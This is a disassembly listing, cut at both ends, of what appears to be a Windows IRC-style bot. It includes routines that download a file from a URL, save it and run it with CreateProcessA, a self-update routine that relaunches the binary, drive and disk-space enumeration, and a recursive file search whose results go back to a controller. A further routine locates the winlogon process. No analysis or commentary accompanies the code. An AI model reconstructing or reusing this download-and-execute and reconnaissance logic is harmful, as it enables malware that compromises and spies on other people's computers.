mov [ebp+var_4], eax
loc_4026A0: ; CODE XREF: sub_4025CE+174�j
xor eax, eax
mov ecx, 80h
lea edi, [ebp+var_610]
rep stosd
lea eax, [ebp+arg_0]
push eax
push 200h
lea eax, [ebp+var_610]
push eax
push [ebp+var_C]
call dword_4358B4 ; InternetReadFile
cmp [ebp+var_78], ebx
jz short loc_4026DE
push [ebp+arg_0]
lea eax, [ebp+var_610]
push eax
call sub_4025B1
pop ecx
pop ecx
loc_4026DE: ; CODE XREF: sub_4025CE+FD�j
push ebx
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
lea eax, [ebp+var_610]
push eax
push [ebp+var_10]
call ds:dword_420040 ; WriteFile
add esi, [ebp+arg_0]
cmp [ebp+var_80], ebx
jz short loc_402703
cmp esi, [ebp+var_80]
ja short loc_402748
loc_402703: ; CODE XREF: sub_4025CE+12E�j
mov eax, esi
shr eax, 0Ah
push eax
lea eax, [ebp+var_38C]
push eax
mov eax, [ebp+var_8C]
imul eax, 234h
add eax, offset dword_4364A0
cmp [ebp+var_88], 1
jz short loc_402731
push offset aDownloadFileDo ; "[DOWNLOAD]: File download: %s (%dKB tra"...
jmp short loc_402736
; ---------------------------------------------------------------------------
loc_402731: ; CODE XREF: sub_4025CE+15A�j
push offset aDownloadUpdate ; "[DOWNLOAD]: Update: %s (%dKB transferre"...
loc_402736: ; CODE XREF: sub_4025CE+161�j
push eax
call sub_414415
add esp, 10h
cmp [ebp+arg_0], ebx
ja loc_4026A0
loc_402748: ; CODE XREF: sub_4025CE+133�j
cmp [ebp+var_80], ebx
mov [ebp+var_8], 1
jz short loc_40279D
cmp esi, [ebp+var_80]
jz short loc_40279D
push [ebp+var_80]
lea eax, [ebp+var_610]
push esi
push offset aDownloadFilesi ; "[DOWNLOAD]: Filesize is incorrect: (%d "...
push eax
mov [ebp+var_8], ebx
call sub_414415
push ebx
push [ebp+var_70]
lea eax, [ebp+var_610]
push eax
lea eax, [ebp+var_40C]
push eax
push [ebp+var_410]
call sub_4056BF
lea eax, [ebp+var_610]
push eax
call sub_401EFF
add esp, 28h
loc_40279D: ; CODE XREF: sub_4025CE+184�j
; sub_4025CE+189�j
call ds:dword_420004 ; GetTickCount
sub eax, [ebp+var_4]
xor edx, edx
mov ecx, 3E8h
div ecx
xor edx, edx
push [ebp+var_10]
mov ecx, eax
inc ecx
mov eax, esi
div ecx
mov edi, eax
call ds:dword_42003C ; CloseHandle
cmp [ebp+var_8], ebx
jz loc_402ACA
cmp [ebp+var_88], 1
jz loc_40298E
test edi, edi
mov [ebp+var_4], edi
fild [ebp+var_4]
jge short loc_4027E9
fadd ds:dbl_420B48
loc_4027E9: ; CODE XREF: sub_4025CE+213�j
test esi, esi
fmul ds:dbl_420B40
push ecx
push ecx
fstp [esp+880h+var_880]
lea eax, [ebp+var_28C]
mov [ebp+var_4], esi
fild [ebp+var_4]
push eax
jge short loc_40280B
fadd ds:dbl_420B48
loc_40280B: ; CODE XREF: sub_4025CE+235�j
fmul ds:dbl_420B40
push ecx
push ecx
lea eax, [ebp+var_610]
fstp [esp+88Ch+var_88C]
push offset aDownloadDownlo ; "[DOWNLOAD]: Downloaded %.1f KB to %s @ "...
push eax
call sub_414415
add esp, 1Ch
cmp [ebp+var_74], ebx
jnz short loc_40284F
push ebx
push [ebp+var_70]
lea eax, [ebp+var_610]
push eax
lea eax, [ebp+var_40C]
push eax
push [ebp+var_410]
call sub_4056BF
add esp, 14h
loc_40284F: ; CODE XREF: sub_4025CE+25F�j
lea eax, [ebp+var_610]
push eax
call sub_401EFF
cmp [ebp+var_84], 1
pop ecx
jnz loc_402ACA
cmp [ebp+var_74], ebx
jnz short loc_4028B9
lea eax, [ebp+var_18C]
push eax
lea eax, [ebp+var_28C]
push eax
lea eax, [ebp+var_610]
push offset aDownloadOpenni ; "[DOWNLOAD]: Openning: %s %s."
push eax
call sub_414415
push ebx
push [ebp+var_70]
lea eax, [ebp+var_610]
push eax
lea eax, [ebp+var_40C]
push eax
push [ebp+var_410]
call sub_4056BF
lea eax, [ebp+var_610]
push eax
call sub_401EFF
add esp, 28h
loc_4028B9: ; CODE XREF: sub_4025CE+29E�j
xor eax, eax
lea edi, [ebp+var_24]
stosd
stosd
stosd
stosd
push 11h
xor eax, eax
pop ecx
lea edi, [ebp+var_68]
rep stosd
mov ecx, 80h
lea edi, [ebp+var_810]
mov [ebp+var_5C], (offset asc_420AE8+2)
mov [ebp+var_68], 44h
mov [ebp+var_3C], 1
mov [ebp+var_38], bx
rep stosd
loc_4028F2: ; CODE XREF: sub_4025CE+335�j
mov cl, [ebp+eax+var_28C]
mov [ebp+eax+var_810], cl
inc eax
cmp cl, bl
jnz short loc_4028F2
lea edi, [ebp+var_810]
dec edi
loc_40290C: ; CODE XREF: sub_4025CE+344�j
mov al, [edi+1]
inc edi
cmp al, bl
jnz short loc_40290C
mov esi, offset asc_420AE8 ; " "
lea eax, [ebp+var_18C]
movsw
mov edx, eax
loc_402923: ; CODE XREF: sub_4025CE+35A�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_402923
lea edi, [ebp+var_810]
sub eax, edx
dec edi
loc_402933: ; CODE XREF: sub_4025CE+36B�j
mov cl, [edi+1]
inc edi
cmp cl, bl
jnz short loc_402933
mov ecx, eax
shr ecx, 2
mov esi, edx
rep movsd
mov ecx, eax
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_68]
push eax
push ebx
push ebx
push 30h
push ebx
push ebx
push ebx
lea eax, [ebp+var_810]
push eax
and ecx, 3
push ebx
rep movsb
call ds:dword_420038 ; CreateProcessA
cmp eax, 1
lea eax, [ebp+var_810]
push eax
lea eax, [ebp+var_610]
jnz short loc_402984
push offset aDownloadApplic ; "[DOWNLOAD]: Application succesfully exe"...
jmp loc_402A8F
; ---------------------------------------------------------------------------
loc_402984: ; CODE XREF: sub_4025CE+3AA�j
push offset aDownloadExecut ; "[DOWNLOAD]: Execution failed: Error exe"...
jmp loc_402A8F
; ---------------------------------------------------------------------------
loc_40298E: ; CODE XREF: sub_4025CE+205�j
test edi, edi
mov [ebp+var_4], edi
fild [ebp+var_4]
jge short loc_40299E
fadd ds:dbl_420B48
loc_40299E: ; CODE XREF: sub_4025CE+3C8�j
test esi, esi
fmul ds:dbl_420B40
push ecx
push ecx
fstp [esp+880h+var_880]
lea eax, [ebp+var_28C]
mov [ebp+var_4], esi
fild [ebp+var_4]
push eax
jge short loc_4029C0
fadd ds:dbl_420B48
loc_4029C0: ; CODE XREF: sub_4025CE+3EA�j
fmul ds:dbl_420B40
push ecx
push ecx
lea eax, [ebp+var_610]
fstp [esp+88Ch+var_88C]
push offset aDownloadDown_0 ; "[DOWNLOAD]: Downloaded %.1fKB to %s @ %"...
push eax
call sub_414415
add esp, 1Ch
cmp [ebp+var_74], ebx
jnz short loc_402A04
push ebx
push [ebp+var_70]
lea eax, [ebp+var_610]
push eax
lea eax, [ebp+var_40C]
push eax
push [ebp+var_410]
call sub_4056BF
add esp, 14h
loc_402A04: ; CODE XREF: sub_4025CE+414�j
lea eax, [ebp+var_610]
push eax
call sub_401EFF
xor eax, eax
pop ecx
lea edi, [ebp+var_24]
stosd
stosd
push 11h
stosd
pop ecx
stosd
xor eax, eax
lea edi, [ebp+var_68]
rep stosd
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_68]
push eax
push ebx
push ebx
push 30h
push ebx
push ebx
push ebx
lea eax, [ebp+var_28C]
xor esi, esi
push eax
inc esi
push ebx
mov [ebp+var_5C], (offset asc_420AE8+2)
mov [ebp+var_68], 44h
mov [ebp+var_3C], esi
mov [ebp+var_38], bx
call ds:dword_420038 ; CreateProcessA
cmp eax, esi
jnz short loc_402A6F
call dword_435920 ; WSACleanup
call sub_4069F7
push ebx
call ds:dword_420034 ; ExitProcess
loc_402A6F: ; CODE XREF: sub_4025CE+48D�j
lea eax, [ebp+var_28C]
push eax
push offset aDownloadUpda_0 ; "[DOWNLOAD]: Update failed: Error execut"...
jmp short loc_402A89
; ---------------------------------------------------------------------------
loc_402A7D: ; CODE XREF: sub_4025CE+45�j
lea eax, [ebp+var_38C]
push eax
push offset aDownloadBadUrl ; "[DOWNLOAD]: Bad URL, or DNS Error: %s."
loc_402A89: ; CODE XREF: sub_4025CE+4AD�j
lea eax, [ebp+var_610]
loc_402A8F: ; CODE XREF: sub_4025CE+3B1�j
; sub_4025CE+3BB�j
push eax
call sub_414415
add esp, 0Ch
cmp [ebp+var_74], ebx
jnz short loc_402ABD
push ebx
push [ebp+var_70]
lea eax, [ebp+var_610]
push eax
lea eax, [ebp+var_40C]
push eax
push [ebp+var_410]
call sub_4056BF
add esp, 14h
loc_402ABD: ; CODE XREF: sub_4025CE+4CD�j
lea eax, [ebp+var_610]
push eax
call sub_401EFF
pop ecx
loc_402ACA: ; CODE XREF: sub_4025CE+1F8�j
; sub_4025CE+295�j
push [ebp+var_C]
call dword_435864 ; InternetCloseHandle
push [ebp+var_8C]
call sub_41255E
loc_402ADE: ; CODE XREF: sub_4025CE+C2�j
pop ecx
push ebx
call ds:dword_420014 ; ExitThread
int 3 ; Trap to Debugger
sub_4025CE endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_402AE7 proc near ; CODE XREF: sub_4089DC+5066�p
; sub_4089DC+51B9�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push [esp+arg_4]
push [esp+4+arg_0]
call sub_414D44
pop ecx
pop ecx
xor ecx, ecx
cmp eax, 0FFFFFFFFh
setnz cl
mov eax, ecx
retn
sub_402AE7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402B01 proc near ; CODE XREF: sub_402C05+66�p
; sub_402C05+97�p ...
var_40 = byte ptr -40h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 40h
and [ebp+var_4], 0
push esi
push edi
push 0Ch
mov esi, offset dword_433EF8
pop ecx
xor eax, eax
mov edi, esi
rep stosd
stosw
lea edi, [ebp+var_40]
push ebx
loc_402B21: ; CODE XREF: sub_402B01+50�j
; sub_402B01+56�j
push 0
push 0Ah
push [ebp+arg_4]
push [ebp+arg_0]
call sub_414D90
add cl, 30h
mov [edi], cl
inc edi
mov [ebp+arg_0], eax
or eax, edx
mov [ebp+var_8], ebx
mov [ebp+arg_4], edx
jz short loc_402B59
inc [ebp+var_4]
mov eax, [ebp+var_4]
push 3
cdq
pop ecx
idiv ecx
test edx, edx
jnz short loc_402B21
mov byte ptr [edi], 2Ch
inc edi
jmp short loc_402B21
; ---------------------------------------------------------------------------
loc_402B59: ; CODE XREF: sub_402B01+40�j
mov eax, esi
pop ebx
jmp short loc_402B63
; ---------------------------------------------------------------------------
loc_402B5E: ; CODE XREF: sub_402B01+68�j
mov cl, [edi]
mov [eax], cl
inc eax
loc_402B63: ; CODE XREF: sub_402B01+5B�j
dec edi
lea ecx, [ebp+var_40]
cmp edi, ecx
jnb short loc_402B5E
and byte ptr [eax], 0
pop edi
mov eax, esi
pop esi
leave
retn
sub_402B01 endp
; =============== S U B R O U T I N E =======================================
sub_402B74 proc near ; CODE XREF: sub_402D20+3E�p
; sub_402D20+74�p
arg_0 = dword ptr 4
push [esp+arg_0]
call dword_435794 ; GetDriveTypeA
sub eax, 0
jz short loc_402BB7
dec eax
jz short loc_402BB1
dec eax
dec eax
jz short loc_402BAB
dec eax
jz short loc_402BA5
dec eax
jz short loc_402B9F
dec eax
jz short loc_402B99
mov eax, offset a? ; "?"
retn
; ---------------------------------------------------------------------------
loc_402B99: ; CODE XREF: sub_402B74+1D�j
mov eax, offset aRam ; "RAM"
retn
; ---------------------------------------------------------------------------
loc_402B9F: ; CODE XREF: sub_402B74+1A�j
mov eax, offset aCdrom ; "Cdrom"
retn
; ---------------------------------------------------------------------------
loc_402BA5: ; CODE XREF: sub_402B74+17�j
mov eax, offset aNetwork ; "Network"
retn
; ---------------------------------------------------------------------------
loc_402BAB: ; CODE XREF: sub_402B74+14�j
mov eax, offset aDisk ; "Disk"
retn
; ---------------------------------------------------------------------------
loc_402BB1: ; CODE XREF: sub_402B74+10�j
mov eax, offset aInvalid ; "Invalid"
retn
; ---------------------------------------------------------------------------
loc_402BB7: ; CODE XREF: sub_402B74+D�j
mov eax, offset aUnknown ; "Unknown"
retn
sub_402B74 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402BBD proc near ; CODE XREF: sub_402C05+12�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 18h
or eax, 0FFFFFFFFh
mov [ebp+var_18], eax
mov [ebp+var_14], eax
mov [ebp+var_10], eax
mov [ebp+var_C], eax
mov [ebp+var_8], eax
mov [ebp+var_4], eax
mov eax, dword_435804
test eax, eax
jz short loc_402BF2
lea ecx, [ebp+var_10]
push ecx
lea ecx, [ebp+var_8]
push ecx
lea ecx, [ebp+var_18]
push ecx
push [ebp+arg_4]
call eax ; GetDiskFreeSpaceExA
loc_402BF2: ; CODE XREF: sub_402BBD+22�j
mov eax, [ebp+arg_0]
push esi
push edi
push 6
pop ecx
lea esi, [ebp+var_18]
mov edi, eax
rep movsd
pop edi
pop esi
leave
retn
sub_402BBD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402C05 proc near ; CODE XREF: sub_402D20+17�p
; sub_4116D2+1BD�p
var_1B0 = byte ptr -1B0h
var_130 = byte ptr -130h
var_B0 = byte ptr -0B0h
var_30 = byte ptr -30h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 1B0h
push esi
push edi
push [ebp+arg_4]
lea eax, [ebp+var_30]
push eax
call sub_402BBD
pop ecx
pop ecx
push 6
mov esi, eax
pop ecx
lea edi, [ebp+var_18]
rep movsd
mov eax, [ebp+var_18]
and eax, [ebp+var_14]
cmp eax, 0FFFFFFFFh
jz loc_402CDD
mov eax, [ebp+var_10]
and eax, [ebp+var_C]
cmp eax, 0FFFFFFFFh
jz loc_402CDD
mov eax, [ebp+var_8]
and eax, [ebp+var_4]
cmp eax, 0FFFFFFFFh
jz loc_402CDD
push ebx
push 0
mov ebx, 400h
push ebx
push [ebp+var_14]
push [ebp+var_18]
call sub_414E30
push edx
push eax
call sub_402B01
push eax
mov edi, offset aSkb ; "%sKB"
push edi
mov esi, 80h
lea eax, [ebp+var_1B0]
push esi
push eax
call sub_41466D
add esp, 18h
push 0
push ebx
push [ebp+var_C]
push [ebp+var_10]
call sub_414E30
push edx
push eax
call sub_402B01
push eax
push edi
lea eax, [ebp+var_130]
push esi
push eax
call sub_41466D
add esp, 18h
push 0
push ebx
push [ebp+var_4]
push [ebp+var_8]
call sub_414E30
push edx
push eax
call sub_402B01
push eax
push edi
lea eax, [ebp+var_B0]
push esi
push eax
call sub_41466D
add esp, 18h
pop ebx
jmp short loc_402D0C
; ---------------------------------------------------------------------------
loc_402CDD: ; CODE XREF: sub_402C05+2C�j
; sub_402C05+3B�j ...
mov esi, offset aFailed ; "failed"
lea eax, [ebp+var_1B0]
push esi
push eax
call sub_414415
lea eax, [ebp+var_130]
push esi
push eax
call sub_414415
lea eax, [ebp+var_B0]
push esi
push eax
call sub_414415
add esp, 18h
loc_402D0C: ; CODE XREF: sub_402C05+D6�j
mov eax, [ebp+arg_0]
push 60h
pop ecx
lea esi, [ebp+var_1B0]
mov edi, eax
rep movsd
pop edi
pop esi
leave
retn
sub_402C05 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402D20 proc near ; CODE XREF: sub_402DDF+B�j
; sub_402DDF+51�p
var_500 = byte ptr -500h
var_380 = byte ptr -380h
var_180 = byte ptr -180h
var_100 = byte ptr -100h
var_80 = byte ptr -80h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 500h
push ebx
mov ebx, [ebp+arg_C]
push esi
push edi
lea eax, [ebp+var_500]
push ebx
push eax
call sub_402C05
pop ecx
pop ecx
push 60h
pop ecx
mov esi, eax
lea edi, [ebp+var_180]
rep movsd
push 7
mov edi, offset aFailed ; "failed"
lea esi, [ebp+var_80]
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_402D80
push ebx
push ebx
call sub_402B74
pop ecx
push eax
push offset aMainSDriveSFai ; "[MAIN]: %s Drive (%s): Failed to stat, "...
lea eax, [ebp+var_380]
push 200h
push eax
call sub_41466D
add esp, 14h
jmp short loc_402DB4
; ---------------------------------------------------------------------------
loc_402D80: ; CODE XREF: sub_402D20+3A�j
lea eax, [ebp+var_180]
push eax
lea eax, [ebp+var_100]
push eax
lea eax, [ebp+var_80]
push eax
push ebx
push ebx
call sub_402B74
pop ecx
push eax
push offset aMainSDriveSSTo ; "[MAIN]: %s Drive (%s): %s total, %s fre"...
lea eax, [ebp+var_380]
push 200h
push eax
call sub_41466D
add esp, 20h
loc_402DB4: ; CODE XREF: sub_402D20+5E�j
push 1
push [ebp+arg_8]
lea eax, [ebp+var_380]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4056BF
lea eax, [ebp+var_380]
push eax
call sub_401EFF
add esp, 18h
pop edi
pop esi
pop ebx
leave
retn
sub_402D20 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402DDF proc near ; CODE XREF: sub_4089DC+46A1�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
xor eax, eax
cmp [ebp+arg_C], eax
jz short loc_402DEF
pop ebp
jmp sub_402D20
; ---------------------------------------------------------------------------
loc_402DEF: ; CODE XREF: sub_402DDF+8�j
push ebx
push esi
push eax
push eax
call dword_4358A4 ; GetLogicalDriveStringsA
lea esi, [eax+2]
push esi
call sub_414CAD
pop ecx
mov ebx, eax
push ebx
push esi
mov [ebp+arg_C], ebx
call dword_4358A4 ; GetLogicalDriveStringsA
cmp byte ptr [ebx], 0
jz short loc_402E52
push edi
loc_402E16: ; CODE XREF: sub_402DDF+6D�j
push 4
mov edi, offset aA ; "A:\\"
mov esi, ebx
pop ecx
xor eax, eax
repe cmpsb
jz short loc_402E38
push ebx
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_402D20
add esp, 10h
loc_402E38: ; CODE XREF: sub_402DDF+45�j
mov eax, ebx
lea edx, [eax+1]
loc_402E3D: ; CODE XREF: sub_402DDF+63�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_402E3D
sub eax, edx
lea ebx, [ebx+eax+1]
cmp [ebx], cl
jnz short loc_402E16
mov ebx, [ebp+arg_C]
pop edi
loc_402E52: ; CODE XREF: sub_402DDF+34�j
push ebx
call sub_414844
pop ecx
pop esi
pop ebx
pop ebp
retn
sub_402DDF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402E5D proc near ; DATA XREF: sub_40E6BB+14�o
var_2B8 = dword ptr -2B8h
var_25C = byte ptr -25Ch
var_158 = byte ptr -158h
var_54 = dword ptr -54h
var_48 = dword ptr -48h
var_28 = dword ptr -28h
var_24 = word ptr -24h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 25Ch
push ebx
push esi
push edi
push dword_4366AC
call dword_435914 ; closesocket
call sub_41240B
call dword_435920 ; WSACleanup
call dword_435920 ; WSACleanup
mov ebx, ds:dword_420000
push 64h
call ebx ; Sleep
xor eax, eax
lea edi, [ebp+var_10]
stosd
stosd
stosd
stosd
push 11h
pop ecx
xor eax, eax
lea edi, [ebp+var_54]
rep stosd
mov esi, 104h
push esi
lea eax, [ebp+var_158]
xor edi, edi
push eax
mov [ebp+var_48], (offset asc_420AE8+2)
mov [ebp+var_54], 44h
mov [ebp+var_28], 1
mov [ebp+var_24], di
call ds:dword_420048 ; GetSystemDirectoryA
push esi
lea eax, [ebp+var_25C]
push eax
push edi
call ds:dword_420010 ; GetModuleFileNameA
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_54]
push eax
lea eax, [ebp+var_158]
push eax
push edi
push 28h
push 1
push edi
push edi
lea eax, [ebp+var_25C]
push eax
push edi
call ds:dword_420038 ; CreateProcessA
test eax, eax
jz short loc_402F1C
push 64h
call ebx ; Sleep
push [ebp+var_10]
mov esi, ds:dword_42003C
call esi ; CloseHandle
push [ebp+var_C]
call esi ; CloseHandle
loc_402F1C: ; CODE XREF: sub_402E5D+A9�j
mov eax, [ebp+arg_8]
mov dword ptr [eax+0B0h], offset dword_433F2C
mov eax, [esp+2B8h+var_2B8]
mov large fs:0, eax
add esp, 8
push edi
call ds:dword_420034 ; ExitProcess
int 3 ; Trap to Debugger
sub_402E5D endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402F3D proc near ; CODE XREF: sub_402F3D+9E�p
; sub_40308F+C3�p
var_54C = byte ptr -54Ch
var_34C = byte ptr -34Ch
var_248 = byte ptr -248h
var_144 = byte ptr -144h
var_118 = byte ptr -118h
var_117 = byte ptr -117h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 54Ch
push ebx
push esi
push edi
push [ebp+arg_10]
mov esi, 104h
push offset aS_1 ; "%s\\*"
lea eax, [ebp+var_248]
push esi
push eax
call sub_41466D
mov edi, ds:dword_420054
add esp, 10h
lea eax, [ebp+var_144]
push eax
lea eax, [ebp+var_248]
push eax
call edi ; FindFirstFileA
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
mov ebx, offset aSS_0 ; "%s\\%s"
jz short loc_402FFA
loc_402F89: ; CODE XREF: sub_402F3D+BB�j
test [ebp+var_144], 10h
jz short loc_402FE6
cmp [ebp+var_118], 2Eh
jnz short loc_402FAD
cmp [ebp+var_117], 0
jz short loc_402FE6
cmp [ebp+var_117], 2Eh
jz short loc_402FE6
loc_402FAD: ; CODE XREF: sub_402F3D+5C�j
lea eax, [ebp+var_118]
push eax
push [ebp+arg_10]
lea eax, [ebp+var_34C]
push ebx
push esi
push eax
call sub_41466D
push [ebp+arg_14]
lea eax, [ebp+var_34C]
push eax
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_402F3D
add esp, 2Ch
mov [ebp+arg_14], eax
loc_402FE6: ; CODE XREF: sub_402F3D+53�j
; sub_402F3D+65�j ...
lea eax, [ebp+var_144]
push eax
push [ebp+var_4]
call ds:dword_420050 ; FindNextFileA
test eax, eax
jnz short loc_402F89
loc_402FFA: ; CODE XREF: sub_402F3D+4A�j
push [ebp+var_4]
call ds:dword_42004C ; FindClose
push [ebp+arg_C]
lea eax, [ebp+var_248]
push [ebp+arg_10]
push ebx
push esi
push eax
call sub_41466D
add esp, 14h
lea eax, [ebp+var_144]
push eax
lea eax, [ebp+var_248]
push eax
call edi ; FindFirstFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_403080
loc_403031: ; CODE XREF: sub_402F3D+141�j
inc [ebp+arg_14]
lea eax, [ebp+var_118]
push eax
push [ebp+arg_10]
lea eax, [ebp+var_54C]
push offset aFoundSS ; " Found: %s\\%s"
push 200h
push eax
call sub_41466D
push 1
push [ebp+arg_8]
lea eax, [ebp+var_54C]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4056BF
add esp, 28h
lea eax, [ebp+var_144]
push eax
push esi
call ds:dword_420050 ; FindNextFileA
test eax, eax
jnz short loc_403031
loc_403080: ; CODE XREF: sub_402F3D+F2�j
push esi
call ds:dword_42004C ; FindClose
mov eax, [ebp+arg_14]
pop edi
pop esi
pop ebx
leave
retn
sub_402F3D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40308F proc near ; DATA XREF: sub_4089DC+2E83�o
var_49C = byte ptr -49Ch
var_29C = dword ptr -29Ch
var_298 = byte ptr -298h
var_218 = byte ptr -218h
var_115 = byte ptr -115h
var_114 = byte ptr -114h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 49Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov esi, eax
mov ecx, 0A7h
lea edi, [ebp+var_29C]
rep movsd
mov dword ptr [eax+298h], 1
lea eax, [ebp+var_114]
lea edx, [eax+1]
xor ebx, ebx
loc_4030C2: ; CODE XREF: sub_40308F+38�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_4030C2
sub eax, edx
cmp [ebp+eax+var_115], 5Ch
jnz short loc_4030EE
lea eax, [ebp+var_114]
lea edx, [eax+1]
loc_4030DE: ; CODE XREF: sub_40308F+54�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_4030DE
sub eax, edx
mov [ebp+eax+var_115], bl
loc_4030EE: ; CODE XREF: sub_40308F+44�j
lea eax, [ebp+var_218]
push eax
push offset aFindfileSearch ; "[FINDFILE]: Searching for file: %s."
lea eax, [ebp+var_49C]
push 200h
push eax
call sub_41466D
add esp, 10h
cmp [ebp+var_8], ebx
jnz short loc_403133
push ebx
push [ebp+var_C]
lea eax, [ebp+var_49C]
push eax
lea eax, [ebp+var_298]
push eax
push [ebp+var_29C]
call sub_4056BF
add esp, 14h
loc_403133: ; CODE XREF: sub_40308F+82�j
push ebx
lea eax, [ebp+var_114]
push eax
lea eax, [ebp+var_218]
push eax
push [ebp+var_C]
lea eax, [ebp+var_298]
push eax
push [ebp+var_29C]
call sub_402F3D
push eax
lea eax, [ebp+var_49C]
push offset aFindfileFilesF ; "[FINDFILE]: Files found: %d."
push eax
call sub_414415
add esp, 24h
cmp [ebp+var_8], ebx
jnz short loc_403191
push ebx
push [ebp+var_C]
lea eax, [ebp+var_49C]
push eax
lea eax, [ebp+var_298]
push eax
push [ebp+var_29C]
call sub_4056BF
add esp, 14h
loc_403191: ; CODE XREF: sub_40308F+E0�j
lea eax, [ebp+var_49C]
push eax
call sub_401EFF
push [ebp+var_10]
call sub_41255E
pop ecx
pop ecx
push ebx
call ds:dword_420014 ; ExitThread
int 3 ; Trap to Debugger
sub_40308F endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4031AF proc near ; CODE XREF: sub_40378E+AB�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
sub esp, 18h
and [esp+18h+var_4], 0
and [esp+18h+var_14], 0
push ebx
push ebp
push esi
mov esi, ds:dword_420060
push edi
mov ebx, 100h
push ebx
push 8
call esi ; GetProcessHeap
mov edi, ds:dword_42005C
push eax
call edi ; RtlAllocateHeap
mov ebp, eax
lea eax, [esp+28h+var_14]
push eax
push ebx
push ebp
push 10h
call dword_434730
push ebp
push 0
call esi ; GetProcessHeap
push eax
call ds:dword_420058 ; RtlFreeHeap
push [esp+28h+var_14]
push 8
call esi ; GetProcessHeap
push eax
call edi ; RtlAllocateHeap
mov ebp, eax
mov eax, [esp+28h+var_14]
lea ecx, [esp+28h+var_C]
push ecx
push eax
push ebp
push 10h
mov [esp+38h+var_C], eax
call dword_434730
test eax, eax
jnz short loc_40329C
mov eax, [esp+28h+var_C]
shr eax, 4
mov [esp+28h+var_10], eax
jz short loc_40329C
xor ecx, ecx
inc ecx
cmp eax, ecx
mov ebx, ebp
mov [esp+28h+var_18], ecx
jb short loc_40329C
loc_403238: ; CODE XREF: sub_4031AF+EB�j
cmp word ptr [ebx+8], 5
jnz short loc_40328F
push 0
push 0
call dword_434F38
mov edi, eax
push edi
push 1
push dword ptr [ebx+4]
call dword_434F3C
test eax, eax
jnz short loc_403280
mov eax, [edi+60h]
mov [esp+28h+var_8], eax
lea eax, [edi+80h]
push offset aWinlogon ; "WINLOGON"
push eax
call sub_414F66
pop ecx
push eax
call sub_414EE0
test eax, eax
pop ecx
pop ecx
jnz short loc_4032B4
loc_403280: ; CODE XREF: sub_4031AF+AA�j
test edi, edi
jz short loc_40328B
push edi
call dword_434F40
loc_40328B: ; CODE XREF: sub_4031AF+D3�j
mov eax, [esp+28h+var_10]
loc_40328F: ; CODE XREF: sub_4031AF+8E�j
add ebx, 10h
inc [esp+28h+var_18]
cmp [esp+28h+var_18], eax
jbe short loc_403238
loc_40329C: ; CODE XREF: sub_4031AF+6D�j
; sub_4031AF+7A�j ...
xor edi, edi
loc_40329E: ; CODE XREF: sub_4031AF+17D�j
push ebp
push 0
call esi ; GetProcessHeap
push eax
call ds:dword_420058 ; RtlFreeHeap
mov eax, edi
loc_4032AC: ; CODE XREF: sub_4031AF+184�j
pop edi
pop esi
pop ebp
pop ebx
add esp, 18h
retn
; ---------------------------------------------------------------------------
loc_4032B4: ; CODE XREF: sub_4031AF+CF�j
and [esp+28h+var_10], 0
cmp [esp+28h+var_8], 0
jbe short loc_40331D
lea eax, [edi+80h]
mov [esp+28h+var_18], eax
loc_4032CA: ; CODE XREF: sub_4031AF+16C�j
add [esp+28h+var_18], 11Ch
push offset aNwgina ; "NWGINA"
push [esp+2Ch+var_18]
